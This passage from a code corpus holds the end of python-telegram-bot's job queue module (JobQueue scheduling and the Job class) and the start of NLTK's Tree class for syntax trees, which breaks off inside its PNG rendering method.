* :obj:`datetime.time` will be interpreted as a specific time at which the job
should run. This could be either today or, if the time has already passed,
tomorrow.
"""
warnings.warn("'JobQueue.put' is being deprecated, use 'JobQueue.run_once', "
"'JobQueue.run_daily' or 'JobQueue.run_repeating' instead")
if job.job_queue is None:
job.job_queue = self
self._put(job, next_t=next_t)
def _put(self, job, next_t=None, last_t=None):
if next_t is None:
next_t = job.interval
if next_t is None:
raise ValueError('next_t is None')
if isinstance(next_t, datetime.datetime):
next_t = (next_t - datetime.datetime.now()).total_seconds()
elif isinstance(next_t, datetime.time):
next_datetime = datetime.datetime.combine(datetime.date.today(), next_t)
if datetime.datetime.now().time() > next_t:
next_datetime += datetime.timedelta(days=1)
next_t = (next_datetime - datetime.datetime.now()).total_seconds()
elif isinstance(next_t, datetime.timedelta):
next_t = next_t.total_seconds()
next_t += last_t or time.time()
self.logger.debug('Putting job %s with t=%f', job.name, next_t)
self.queue.put((next_t, job))
# Wake up the loop if this job should be executed next
self._set_next_peek(next_t)
def run_once(self, callback, when, context=None, name=None):
"""Creates a new ``Job`` that runs once and adds it to the queue.
Args:
callback (:obj:`callable`): The callback function that should be executed by the new
job. It should take ``bot, job`` as parameters, where ``job`` is the
:class:`telegram.ext.Job` instance. It can be used to access it's
``job.context`` or change it to a repeating job.
when (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta` | :obj:`datetime.datetime` | :obj:`datetime.time`):
Time in or at which the job should run. This parameter will be interpreted
depending on its type.
* :obj:`int` or :obj:`float` will be interpreted as "seconds from now" in which the
job should run.
* :obj:`datetime.timedelta` will be interpreted as "time from now" in which the
job should run.
* :obj:`datetime.datetime` will be interpreted as a specific date and time at
which the job should run.
* :obj:`datetime.time` will be interpreted as a specific time of day at which the
job should run. This could be either today or, if the time has already passed,
tomorrow.
context (:obj:`object`, optional): Additional data needed for the callback function.
Can be accessed through ``job.context`` in the callback. Defaults to ``None``.
name (:obj:`str`, optional): The name of the new job. Defaults to
``callback.__name__``.
Returns:
:class:`telegram.ext.Job`: The new ``Job`` instance that has been added to the job
queue.
"""
job = Job(callback, repeat=False, context=context, name=name, job_queue=self)
self._put(job, next_t=when)
return job
def run_repeating(self, callback, interval, first=None, context=None, name=None):
"""Creates a new ``Job`` that runs once and adds it to the queue.
Args:
callback (:obj:`callable`): The callback function that should be executed by the new
job. It should take ``bot, job`` as parameters, where ``job`` is the
:class:`telegram.ext.Job` instance. It can be used to access it's
``Job.context`` or change it to a repeating job.
interval (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta`): The interval in which
the job will run. If it is an :obj:`int` or a :obj:`float`, it will be interpreted
as seconds.
first (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta` | :obj:`datetime.datetime` | :obj:`datetime.time`, optional):
Time in or at which the job should run. This parameter will be interpreted
depending on its type.
* :obj:`int` or :obj:`float` will be interpreted as "seconds from now" in which the
job should run.
* :obj:`datetime.timedelta` will be interpreted as "time from now" in which the
job should run.
* :obj:`datetime.datetime` will be interpreted as a specific date and time at
which the job should run.
* :obj:`datetime.time` will be interpreted as a specific time of day at which the
job should run. This could be either today or, if the time has already passed,
tomorrow.
Defaults to ``interval``
context (:obj:`object`, optional): Additional data needed for the callback function.
Can be accessed through ``job.context`` in the callback. Defaults to ``None``.
name (:obj:`str`, optional): The name of the new job. Defaults to
``callback.__name__``.
Returns:
:class:`telegram.ext.Job`: The new ``Job`` instance that has been added to the job
queue.
"""
job = Job(callback,
interval=interval,
repeat=True,
context=context,
name=name,
job_queue=self)
self._put(job, next_t=first)
return job
def run_daily(self, callback, time, days=Days.EVERY_DAY, context=None, name=None):
"""Creates a new ``Job`` that runs once and adds it to the queue.
Args:
callback (:obj:`callable`): The callback function that should be executed by the new
job. It should take ``bot, job`` as parameters, where ``job`` is the
:class:`telegram.ext.Job` instance. It can be used to access it's ``Job.context``
or change it to a repeating job.
time (:obj:`datetime.time`): Time of day at which the job should run.
days (Tuple[:obj:`int`], optional): Defines on which days of the week the job should
run. Defaults to ``EVERY_DAY``
context (:obj:`object`, optional): Additional data needed for the callback function.
Can be accessed through ``job.context`` in the callback. Defaults to ``None``.
name (:obj:`str`, optional): The name of the new job. Defaults to
``callback.__name__``.
Returns:
:class:`telegram.ext.Job`: The new ``Job`` instance that has been added to the job
queue.
"""
job = Job(callback,
interval=datetime.timedelta(days=1),
repeat=True,
days=days,
context=context,
name=name,
job_queue=self)
self._put(job, next_t=time)
return job
def _set_next_peek(self, t):
# """
# Set next peek if not defined or `t` is before next peek.
# In case the next peek was set, also trigger the `self.__tick` event.
# """
with self.__next_peek_lock:
if not self._next_peek or self._next_peek > t:
self._next_peek = t
self.__tick.set()
def tick(self):
"""Run all jobs that are due and re-enqueue them with their interval."""
now = time.time()
self.logger.debug('Ticking jobs with t=%f', now)
while True:
try:
t, job = self.queue.get(False)
except Empty:
break
self.logger.debug('Peeked at %s with t=%f', job.name, t)
if t > now:
# We can get here in two conditions:
# 1. At the second or later pass of the while loop, after we've already
# processed the job(s) we were supposed to at this time.
# 2. At the first iteration of the loop only if `self.put()` had triggered
# `self.__tick` because `self._next_peek` wasn't set
self.logger.debug("Next task isn't due yet. Finished!")
self.queue.put((t, job))
self._set_next_peek(t)
break
if job.removed:
self.logger.debug('Removing job %s', job.name)
continue
if job.enabled:
try:
current_week_day = datetime.datetime.now().weekday()
if any(day == current_week_day for day in job.days):
self.logger.debug('Running job %s', job.name)
job.run(self.bot)
except:
self.logger.exception('An uncaught error was raised while executing job %s',
job.name)
else:
self.logger.debug('Skipping disabled job %s', job.name)
if job.repeat and not job.removed:
self._put(job, last_t=t)
else:
self.logger.debug('Dropping non-repeating or removed job %s', job.name)
def start(self):
"""Starts the job_queue thread."""
self.__start_lock.acquire()
if not self._running:
self._running = True
self.__start_lock.release()
self.__thread = Thread(target=self._main_loop, name="job_queue")
self.__thread.start()
self.logger.debug('%s thread started', self.__class__.__name__)
else:
self.__start_lock.release()
def _main_loop(self):
"""
Thread target of thread ``job_queue``. Runs in background and performs ticks on the job
queue.
"""
while self._running:
# self._next_peek may be (re)scheduled during self.tick() or self.put()
with self.__next_peek_lock:
tmout = self._next_peek - time.time() if self._next_peek else None
self._next_peek = None
self.__tick.clear()
self.__tick.wait(tmout)
# If we were woken up by self.stop(), just bail out
if not self._running:
break
self.tick()
self.logger.debug('%s thread stopped', self.__class__.__name__)
def stop(self):
"""Stops the thread."""
with self.__start_lock:
self._running = False
self.__tick.set()
if self.__thread is not None:
self.__thread.join()
def jobs(self):
"""Returns a tuple of all jobs that are currently in the ``JobQueue``."""
return tuple(job[1] for job in self.queue.queue if job)
class Job(object):
"""This class encapsulates a Job.
Attributes:
callback (:obj:`callable`): The callback function that should be executed by the new job.
context (:obj:`object`): Optional. Additional data needed for the callback function.
name (:obj:`str`): Optional. The name of the new job.
Args:
callback (:obj:`callable`): The callback function that should be executed by the new job.
It should take ``bot, job`` as parameters, where ``job`` is the
:class:`telegram.ext.Job` instance. It can be used to access it's :attr:`context`
or change it to a repeating job.
interval (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta`, optional): The interval in
which the job will run. If it is an :obj:`int` or a :obj:`float`, it will be
interpreted as seconds. If you don't set this value, you must set :attr:`repeat` to
``False`` and specify :attr:`next_t` when you put the job into the job queue.
repeat (:obj:`bool`, optional): If this job should be periodically execute its callback
function (``True``) or only once (``False``). Defaults to ``True``.
context (:obj:`object`, optional): Additional data needed for the callback function. Can be
accessed through ``job.context`` in the callback. Defaults to ``None``.
name (:obj:`str`, optional): The name of the new job. Defaults to ``callback.__name__``.
days (Tuple[:obj:`int`], optional): Defines on which days of the week the job should run.
Defaults to ``Days.EVERY_DAY``
job_queue (class:`telegram.ext.JobQueue`, optional): The ``JobQueue`` this job belongs to.
Only optional for backward compatibility with ``JobQueue.put()``.
"""
def __init__(self,
callback,
interval=None,
repeat=True,
context=None,
days=Days.EVERY_DAY,
name=None,
job_queue=None):
self.callback = callback
self.context = context
self.name = name or callback.__name__
self._repeat = repeat
self._interval = None
self.interval = interval
self.repeat = repeat
self._days = None
self.days = days
self._job_queue = weakref.proxy(job_queue) if job_queue is not None else None
self._remove = Event()
self._enabled = Event()
self._enabled.set()
def run(self, bot):
"""Executes the callback function."""
self.callback(bot, self)
def schedule_removal(self):
"""
Schedules this job for removal from the ``JobQueue``. It will be removed without executing
its callback function again.
"""
self._remove.set()
@property
def removed(self):
""":obj:`bool`: Whether this job is due to be removed."""
return self._remove.is_set()
@property
def enabled(self):
""":obj:`bool`: Whether this job is enabled."""
return self._enabled.is_set()
@enabled.setter
def enabled(self, status):
if status:
self._enabled.set()
else:
self._enabled.clear()
@property
def interval(self):
"""
:obj:`int` | :obj:`float` | :obj:`datetime.timedelta`: Optional. The interval in which the
job will run.
"""
return self._interval
@interval.setter
def interval(self, interval):
if interval is None and self.repeat:
raise ValueError("The 'interval' can not be 'None' when 'repeat' is set to 'True'")
if not (interval is None or isinstance(interval, (Number, datetime.timedelta))):
raise ValueError("The 'interval' must be of type 'datetime.timedelta',"
" 'int' or 'float'")
self._interval = interval
@property
def interval_seconds(self):
""":obj:`int`: The interval for this job in seconds."""
if isinstance(self.interval, datetime.timedelta):
return self.interval.total_seconds()
else:
return self.interval
@property
def repeat(self):
""":obj:`bool`: Optional. If this job should periodically execute its callback function."""
return self._repeat
@repeat.setter
def repeat(self, repeat):
if self.interval is None and repeat:
raise ValueError("'repeat' can not be set to 'True' when no 'interval' is set")
self._repeat = repeat
@property
def days(self):
"""Tuple[:obj:`int`]: Optional. Defines on which days of the week the job should run."""
return self._days
@days.setter
def days(self, days):
if not isinstance(days, tuple):
raise ValueError("The 'days' argument should be of type 'tuple'")
if not all(isinstance(day, int) for day in days):
raise ValueError("The elements of the 'days' argument should be of type 'int'")
if not all(0 <= day <= 6 for day in days):
raise ValueError("The elements of the 'days' argument should be from 0 up to and "
"including 6")
self._days = days
@property
def job_queue(self):
""":class:`telegram.ext.JobQueue`: Optional. The ``JobQueue`` this job belongs to."""
return self._job_queue
@job_queue.setter
def job_queue(self, job_queue):
# Property setter for backward compatibility with JobQueue.put()
if not self._job_queue:
self._job_queue = weakref.proxy(job_queue)
else:
raise RuntimeError("The 'job_queue' attribute can only be set once.")
def __lt__(self, other):
return False
| rogerscristo/BotFWD | env/lib/python3.6/site-packages/telegram/ext/jobqueue.py | Python | mit | 20,684 | 0.004448 |
# -*- coding: utf-8 -*-
# Natural Language Toolkit: Text Trees
#
# Copyright (C) 2001-2015 NLTK Project
# Author: Edward Loper <edloper@gmail.com>
# Steven Bird <stevenbird1@gmail.com>
# Peter Ljunglöf <peter.ljunglof@gu.se>
# Nathan Bodenstab <bodenstab@cslu.ogi.edu> (tree transforms)
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Class for representing hierarchical language structures, such as
syntax trees and morphological trees.
"""
from __future__ import print_function, unicode_literals
# TODO: add LabelledTree (can be used for dependency trees)
import re
from nltk.grammar import Production, Nonterminal
from nltk.probability import ProbabilisticMixIn
from nltk.util import slice_bounds
from nltk.compat import string_types, python_2_unicode_compatible, unicode_repr
from nltk.internals import raise_unorderable_types
######################################################################
## Trees
######################################################################
@python_2_unicode_compatible
class Tree(list):
"""
A Tree represents a hierarchical grouping of leaves and subtrees.
For example, each constituent in a syntax tree is represented by a single Tree.
A tree's children are encoded as a list of leaves and subtrees,
where a leaf is a basic (non-tree) value; and a subtree is a
nested Tree.
>>> from nltk.tree import Tree
>>> print(Tree(1, [2, Tree(3, [4]), 5]))
(1 2 (3 4) 5)
>>> vp = Tree('VP', [Tree('V', ['saw']),
... Tree('NP', ['him'])])
>>> s = Tree('S', [Tree('NP', ['I']), vp])
>>> print(s)
(S (NP I) (VP (V saw) (NP him)))
>>> print(s[1])
(VP (V saw) (NP him))
>>> print(s[1,1])
(NP him)
>>> t = Tree.fromstring("(S (NP I) (VP (V saw) (NP him)))")
>>> s == t
True
>>> t[1][1].set_label('X')
>>> t[1][1].label()
'X'
>>> print(t)
(S (NP I) (VP (V saw) (X him)))
>>> t[0], t[1,1] = t[1,1], t[0]
>>> print(t)
(S (X him) (VP (V saw) (NP I)))
The length of a tree is the number of children it has.
>>> len(t)
2
The set_label() and label() methods allow individual constituents
to be labeled. For example, syntax trees use this label to specify
phrase tags, such as "NP" and "VP".
Several Tree methods use "tree positions" to specify
children or descendants of a tree. Tree positions are defined as
follows:
- The tree position *i* specifies a Tree's *i*\ th child.
- The tree position ``()`` specifies the Tree itself.
- If *p* is the tree position of descendant *d*, then
*p+i* specifies the *i*\ th child of *d*.
I.e., every tree position is either a single index *i*,
specifying ``tree[i]``; or a sequence *i1, i2, ..., iN*,
specifying ``tree[i1][i2]...[iN]``.
Construct a new tree. This constructor can be called in one
of two ways:
- ``Tree(label, children)`` constructs a new tree with the
specified label and list of children.
- ``Tree.fromstring(s)`` constructs a new tree by parsing the string ``s``.
"""
def __init__(self, node, children=None):
if children is None:
raise TypeError("%s: Expected a node value and child list "
% type(self).__name__)
elif isinstance(children, string_types):
raise TypeError("%s() argument 2 should be a list, not a "
"string" % type(self).__name__)
else:
list.__init__(self, children)
self._label = node
#////////////////////////////////////////////////////////////
# Comparison operators
#////////////////////////////////////////////////////////////
def __eq__(self, other):
return (self.__class__ is other.__class__ and
(self._label, list(self)) == (other._label, list(other)))
def __lt__(self, other):
if not isinstance(other, Tree):
# raise_unorderable_types("<", self, other)
# Sometimes children can be pure strings,
# so we need to be able to compare with non-trees:
return self.__class__.__name__ < other.__class__.__name__
elif self.__class__ is other.__class__:
return (self._label, list(self)) < (other._label, list(other))
else:
return self.__class__.__name__ < other.__class__.__name__
# @total_ordering doesn't work here, since the class inherits from a builtin class
__ne__ = lambda self, other: not self == other
__gt__ = lambda self, other: not (self < other or self == other)
__le__ = lambda self, other: self < other or self == other
__ge__ = lambda self, other: not self < other
#////////////////////////////////////////////////////////////
# Disabled list operations
#////////////////////////////////////////////////////////////
def __mul__(self, v):
raise TypeError('Tree does not support multiplication')
def __rmul__(self, v):
raise TypeError('Tree does not support multiplication')
def __add__(self, v):
raise TypeError('Tree does not support addition')
def __radd__(self, v):
raise TypeError('Tree does not support addition')
#////////////////////////////////////////////////////////////
# Indexing (with support for tree positions)
#////////////////////////////////////////////////////////////
def __getitem__(self, index):
if isinstance(index, (int, slice)):
return list.__getitem__(self, index)
elif isinstance(index, (list, tuple)):
if len(index) == 0:
return self
elif len(index) == 1:
return self[index[0]]
else:
return self[index[0]][index[1:]]
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
def __setitem__(self, index, value):
if isinstance(index, (int, slice)):
return list.__setitem__(self, index, value)
elif isinstance(index, (list, tuple)):
if len(index) == 0:
raise IndexError('The tree position () may not be '
'assigned to.')
elif len(index) == 1:
self[index[0]] = value
else:
self[index[0]][index[1:]] = value
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
def __delitem__(self, index):
if isinstance(index, (int, slice)):
return list.__delitem__(self, index)
elif isinstance(index, (list, tuple)):
if len(index) == 0:
raise IndexError('The tree position () may not be deleted.')
elif len(index) == 1:
del self[index[0]]
else:
del self[index[0]][index[1:]]
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
#////////////////////////////////////////////////////////////
# Basic tree operations
#////////////////////////////////////////////////////////////
def _get_node(self):
"""Outdated method to access the node value; use the label() method instead."""
raise NotImplementedError("Use label() to access a node label.")
def _set_node(self, value):
"""Outdated method to set the node value; use the set_label() method instead."""
raise NotImplementedError("Use set_label() method to set a node label.")
node = property(_get_node, _set_node)
def label(self):
"""
Return the node label of the tree.
>>> t = Tree.fromstring('(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))')
>>> t.label()
'S'
:return: the node label (typically a string)
:rtype: any
"""
return self._label
def set_label(self, label):
"""
Set the node label of the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.set_label("T")
>>> print(t)
(T (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))
:param label: the node label (typically a string)
:type label: any
"""
self._label = label
def leaves(self):
"""
Return the leaves of the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.leaves()
['the', 'dog', 'chased', 'the', 'cat']
:return: a list containing this tree's leaves.
The order reflects the order of the
leaves in the tree's hierarchical structure.
:rtype: list
"""
leaves = []
for child in self:
if isinstance(child, Tree):
leaves.extend(child.leaves())
else:
leaves.append(child)
return leaves
def flatten(self):
"""
Return a flat version of the tree, with all non-root non-terminals removed.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> print(t.flatten())
(S the dog chased the cat)
:return: a tree consisting of this tree's root connected directly to
its leaves, omitting all intervening non-terminal nodes.
:rtype: Tree
"""
return Tree(self.label(), self.leaves())
def height(self):
"""
Return the height of the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.height()
5
>>> print(t[0,0])
(D the)
>>> t[0,0].height()
2
:return: The height of this tree. The height of a tree
containing no children is 1; the height of a tree
containing only leaves is 2; and the height of any other
tree is one plus the maximum of its children's
heights.
:rtype: int
"""
max_child_height = 0
for child in self:
if isinstance(child, Tree):
max_child_height = max(max_child_height, child.height())
else:
max_child_height = max(max_child_height, 1)
return 1 + max_child_height
def treepositions(self, order='preorder'):
"""
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.treepositions() # doctest: +ELLIPSIS
[(), (0,), (0, 0), (0, 0, 0), (0, 1), (0, 1, 0), (1,), (1, 0), (1, 0, 0), ...]
>>> for pos in t.treepositions('leaves'):
... t[pos] = t[pos][::-1].upper()
>>> print(t)
(S (NP (D EHT) (N GOD)) (VP (V DESAHC) (NP (D EHT) (N TAC))))
:param order: One of: ``preorder``, ``postorder``, ``bothorder``,
``leaves``.
"""
positions = []
if order in ('preorder', 'bothorder'): positions.append( () )
for i, child in enumerate(self):
if isinstance(child, Tree):
childpos = child.treepositions(order)
positions.extend((i,)+p for p in childpos)
else:
positions.append( (i,) )
if order in ('postorder', 'bothorder'): positions.append( () )
return positions
def subtrees(self, filter=None):
"""
Generate all the subtrees of this tree, optionally restricted
to trees matching the filter function.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> for s in t.subtrees(lambda t: t.height() == 2):
... print(s)
(D the)
(N dog)
(V chased)
(D the)
(N cat)
:type filter: function
:param filter: the function to filter all local trees
"""
if not filter or filter(self):
yield self
for child in self:
if isinstance(child, Tree):
for subtree in child.subtrees(filter):
yield subtree
def productions(self):
"""
Generate the productions that correspond to the non-terminal nodes of the tree.
For each subtree of the form (P: C1 C2 ... Cn) this produces a production of the
form P -> C1 C2 ... Cn.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.productions()
[S -> NP VP, NP -> D N, D -> 'the', N -> 'dog', VP -> V NP, V -> 'chased',
NP -> D N, D -> 'the', N -> 'cat']
:rtype: list(Production)
"""
if not isinstance(self._label, string_types):
raise TypeError('Productions can only be generated from trees having node labels that are strings')
prods = [Production(Nonterminal(self._label), _child_names(self))]
for child in self:
if isinstance(child, Tree):
prods += child.productions()
return prods
def pos(self):
"""
Return a sequence of pos-tagged words extracted from the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.pos()
[('the', 'D'), ('dog', 'N'), ('chased', 'V'), ('the', 'D'), ('cat', 'N')]
:return: a list of tuples containing leaves and pre-terminals (part-of-speech tags).
The order reflects the order of the leaves in the tree's hierarchical structure.
:rtype: list(tuple)
"""
pos = []
for child in self:
if isinstance(child, Tree):
pos.extend(child.pos())
else:
pos.append((child, self._label))
return pos
def leaf_treeposition(self, index):
"""
:return: The tree position of the ``index``-th leaf in this
tree. I.e., if ``tp=self.leaf_treeposition(i)``, then
``self[tp]==self.leaves()[i]``.
:raise IndexError: If this tree contains fewer than ``index+1``
leaves, or if ``index<0``.
"""
if index < 0: raise IndexError('index must be non-negative')
stack = [(self, ())]
while stack:
value, treepos = stack.pop()
if not isinstance(value, Tree):
if index == 0: return treepos
else: index -= 1
else:
for i in range(len(value)-1, -1, -1):
stack.append( (value[i], treepos+(i,)) )
raise IndexError('index must be less than or equal to len(self)')
def treeposition_spanning_leaves(self, start, end):
"""
:return: The tree position of the lowest descendant of this
tree that dominates ``self.leaves()[start:end]``.
:raise ValueError: if ``end <= start``
"""
if end <= start:
raise ValueError('end must be greater than start')
# Find the tree positions of the start & end leaves, and
# take the longest common subsequence.
start_treepos = self.leaf_treeposition(start)
end_treepos = self.leaf_treeposition(end-1)
# Find the first index where they mismatch:
for i in range(len(start_treepos)):
if i == len(end_treepos) or start_treepos[i] != end_treepos[i]:
return start_treepos[:i]
return start_treepos
#////////////////////////////////////////////////////////////
# Transforms
#////////////////////////////////////////////////////////////
def chomsky_normal_form(self, factor="right", horzMarkov=None, vertMarkov=0, childChar="|", parentChar="^"):
"""
This method can modify a tree in three ways:
1. Convert a tree into its Chomsky Normal Form (CNF)
equivalent -- Every subtree has either two non-terminals
or one terminal as its children. This process requires
the creation of more"artificial" non-terminal nodes.
2. Markov (vertical) smoothing of children in new artificial
nodes
3. Horizontal (parent) annotation of nodes
:param factor: Right or left factoring method (default = "right")
:type factor: str = [left|right]
:param horzMarkov: Markov order for sibling smoothing in artificial nodes (None (default) = include all siblings)
:type horzMarkov: int | None
:param vertMarkov: Markov order for parent smoothing (0 (default) = no vertical annotation)
:type vertMarkov: int | None
:param childChar: A string used in construction of the artificial nodes, separating the head of the
original subtree from the child nodes that have yet to be expanded (default = "|")
:type childChar: str
:param parentChar: A string used to separate the node representation from its vertical annotation
:type parentChar: str
"""
from nltk.treetransforms import chomsky_normal_form
chomsky_normal_form(self, factor, horzMarkov, vertMarkov, childChar, parentChar)
def un_chomsky_normal_form(self, expandUnary = True, childChar = "|", parentChar = "^", unaryChar = "+"):
"""
This method modifies the tree in three ways:
1. Transforms a tree in Chomsky Normal Form back to its
original structure (branching greater than two)
2. Removes any parent annotation (if it exists)
3. (optional) expands unary subtrees (if previously
collapsed with collapseUnary(...) )
:param expandUnary: Flag to expand unary or not (default = True)
:type expandUnary: bool
:param childChar: A string separating the head node from its children in an artificial node (default = "|")
:type childChar: str
:param parentChar: A sting separating the node label from its parent annotation (default = "^")
:type parentChar: str
:param unaryChar: A string joining two non-terminals in a unary production (default = "+")
:type unaryChar: str
"""
from nltk.treetransforms import un_chomsky_normal_form
un_chomsky_normal_form(self, expandUnary, childChar, parentChar, unaryChar)
def collapse_unary(self, collapsePOS = False, collapseRoot = False, joinChar = "+"):
"""
Collapse subtrees with a single child (ie. unary productions)
into a new non-terminal (Tree node) joined by 'joinChar'.
This is useful when working with algorithms that do not allow
unary productions, and completely removing the unary productions
would require loss of useful information. The Tree is modified
directly (since it is passed by reference) and no value is returned.
:param collapsePOS: 'False' (default) will not collapse the parent of leaf nodes (ie.
Part-of-Speech tags) since they are always unary productions
:type collapsePOS: bool
:param collapseRoot: 'False' (default) will not modify the root production
if it is unary. For the Penn WSJ treebank corpus, this corresponds
to the TOP -> productions.
:type collapseRoot: bool
:param joinChar: A string used to connect collapsed node values (default = "+")
:type joinChar: str
"""
from nltk.treetransforms import collapse_unary
collapse_unary(self, collapsePOS, collapseRoot, joinChar)
#////////////////////////////////////////////////////////////
# Convert, copy
#////////////////////////////////////////////////////////////
@classmethod
def convert(cls, tree):
"""
Convert a tree between different subtypes of Tree. ``cls`` determines
which class will be used to encode the new tree.
:type tree: Tree
:param tree: The tree that should be converted.
:return: The new Tree.
"""
if isinstance(tree, Tree):
children = [cls.convert(child) for child in tree]
return cls(tree._label, children)
else:
return tree
def copy(self, deep=False):
if not deep: return type(self)(self._label, self)
else: return type(self).convert(self)
def _frozen_class(self): return ImmutableTree
def freeze(self, leaf_freezer=None):
frozen_class = self._frozen_class()
if leaf_freezer is None:
newcopy = frozen_class.convert(self)
else:
newcopy = self.copy(deep=True)
for pos in newcopy.treepositions('leaves'):
newcopy[pos] = leaf_freezer(newcopy[pos])
newcopy = frozen_class.convert(newcopy)
hash(newcopy) # Make sure the leaves are hashable.
return newcopy
#////////////////////////////////////////////////////////////
# Parsing
#////////////////////////////////////////////////////////////
@classmethod
def fromstring(cls, s, brackets='()', read_node=None, read_leaf=None,
node_pattern=None, leaf_pattern=None,
remove_empty_top_bracketing=False):
"""
Read a bracketed tree string and return the resulting tree.
Trees are represented as nested brackettings, such as::
(S (NP (NNP John)) (VP (V runs)))
:type s: str
:param s: The string to read
:type brackets: str (length=2)
:param brackets: The bracket characters used to mark the
beginning and end of trees and subtrees.
:type read_node: function
:type read_leaf: function
:param read_node, read_leaf: If specified, these functions
are applied to the substrings of ``s`` corresponding to
nodes and leaves (respectively) to obtain the values for
those nodes and leaves. They should have the following
signature:
read_node(str) -> value
For example, these functions could be used to process nodes
and leaves whose values should be some type other than
string (such as ``FeatStruct``).
Note that by default, node strings and leaf strings are
delimited by whitespace and brackets; to override this
default, use the ``node_pattern`` and ``leaf_pattern``
arguments.
:type node_pattern: str
:type leaf_pattern: str
:param node_pattern, leaf_pattern: Regular expression patterns
used to find node and leaf substrings in ``s``. By
default, both nodes patterns are defined to match any
sequence of non-whitespace non-bracket characters.
:type remove_empty_top_bracketing: bool
:param remove_empty_top_bracketing: If the resulting tree has
an empty node label, and is length one, then return its
single child instead. This is useful for treebank trees,
which sometimes contain an extra level of bracketing.
:return: A tree corresponding to the string representation ``s``.
If this class method is called using a subclass of Tree,
then it will return a tree of that type.
:rtype: Tree
"""
if not isinstance(brackets, string_types) or len(brackets) != 2:
raise TypeError('brackets must be a length-2 string')
if re.search('\s', brackets):
raise TypeError('whitespace brackets not allowed')
# Construct a regexp that will tokenize the string.
open_b, close_b = brackets
open_pattern, close_pattern = (re.escape(open_b), re.escape(close_b))
if node_pattern is None:
node_pattern = '[^\s%s%s]+' % (open_pattern, close_pattern)
if leaf_pattern is None:
leaf_pattern = '[^\s%s%s]+' % (open_pattern, close_pattern)
token_re = re.compile('%s\s*(%s)?|%s|(%s)' % (
open_pattern, node_pattern, close_pattern, leaf_pattern))
# Walk through each token, updating a stack of trees.
stack = [(None, [])] # list of (node, children) tuples
for match in token_re.finditer(s):
token = match.group()
# Beginning of a tree/subtree
if token[0] == open_b:
if len(stack) == 1 and len(stack[0][1]) > 0:
cls._parse_error(s, match, 'end-of-string')
label = token[1:].lstrip()
if read_node is not None: label = read_node(label)
stack.append((label, []))
# End of a tree/subtree
elif token == close_b:
if len(stack) == 1:
if len(stack[0][1]) == 0:
cls._parse_error(s, match, open_b)
else:
cls._parse_error(s, match, 'end-of-string')
label, children = stack.pop()
stack[-1][1].append(cls(label, children))
# Leaf node
else:
if len(stack) == 1:
cls._parse_error(s, match, open_b)
if read_leaf is not None: token = read_leaf(token)
stack[-1][1].append(token)
# check that we got exactly one complete tree.
if len(stack) > 1:
cls._parse_error(s, 'end-of-string', close_b)
elif len(stack[0][1]) == 0:
cls._parse_error(s, 'end-of-string', open_b)
else:
assert stack[0][0] is None
assert len(stack[0][1]) == 1
tree = stack[0][1][0]
# If the tree has an extra level with node='', then get rid of
# it. E.g.: "((S (NP ...) (VP ...)))"
if remove_empty_top_bracketing and tree._label == '' and len(tree) == 1:
tree = tree[0]
# return the tree.
return tree
@classmethod
def _parse_error(cls, s, match, expecting):
"""
Display a friendly error message when parsing a tree string fails.
:param s: The string we're parsing.
:param match: regexp match of the problem token.
:param expecting: what we expected to see instead.
"""
# Construct a basic error message
if match == 'end-of-string':
pos, token = len(s), 'end-of-string'
else:
pos, token = match.start(), match.group()
msg = '%s.read(): expected %r but got %r\n%sat index %d.' % (
cls.__name__, expecting, token, ' '*12, pos)
# Add a display showing the error token itsels:
s = s.replace('\n', ' ').replace('\t', ' ')
offset = pos
if len(s) > pos+10:
s = s[:pos+10]+'...'
if pos > 10:
s = '...'+s[pos-10:]
offset = 13
msg += '\n%s"%s"\n%s^' % (' '*16, s, ' '*(17+offset))
raise ValueError(msg)
#////////////////////////////////////////////////////////////
# Visualization & String Representation
#////////////////////////////////////////////////////////////
def draw(self):
"""
Open a new window containing a graphical diagram of this tree.
"""
from nltk.draw.tree import draw_trees
draw_trees(self)
def pretty_print(self, sentence=None, highlight=(), stream=None, **kwargs):
"""
Pretty-print this tree as ASCII or Unicode art.
For explanation of the arguments, see the documentation for
`nltk.treeprettyprinter.TreePrettyPrinter`.
"""
from nltk.treeprettyprinter import TreePrettyPrinter
print(TreePrettyPrinter(self, sentence, highlight).text(**kwargs),
file=stream)
def __repr__(self):
childstr = ", ".join(unicode_repr(c) for c in self)
return '%s(%s, [%s])' % (type(self).__name__, unicode_repr(self._label), childstr)
def _repr_png_(self):
"""
Draws and outputs in PNG for ipython.
PNG is used instead of PDF, since it can be displayed in the qt console and
has wider browser support.
"""
import os
import base64
import subprocess
import tempfile
from nltk.draw.tree import tree_to_treesegment
from nltk.draw.util import CanvasFrame
from nltk.internals import find_binary
_canvas_frame = CanvasFrame()
widget = tree_to_treesegment(_canvas_frame.canvas(), self)
_canvas_frame.add_widget(widget)
x, y, w, h = widget.bbox()
# print_to_file uses scrollregion to set the width and height of the pdf.
_canvas_frame.canvas()['scrollregion'] = (0, 0, w, h)
with tempfile.NamedTemporaryFile() as file:
in_path = '{0:}.ps'.format(file.name)
out_path = '{0:}.png'.format(file.name)
_canvas_frame.print_to_file(in_path)
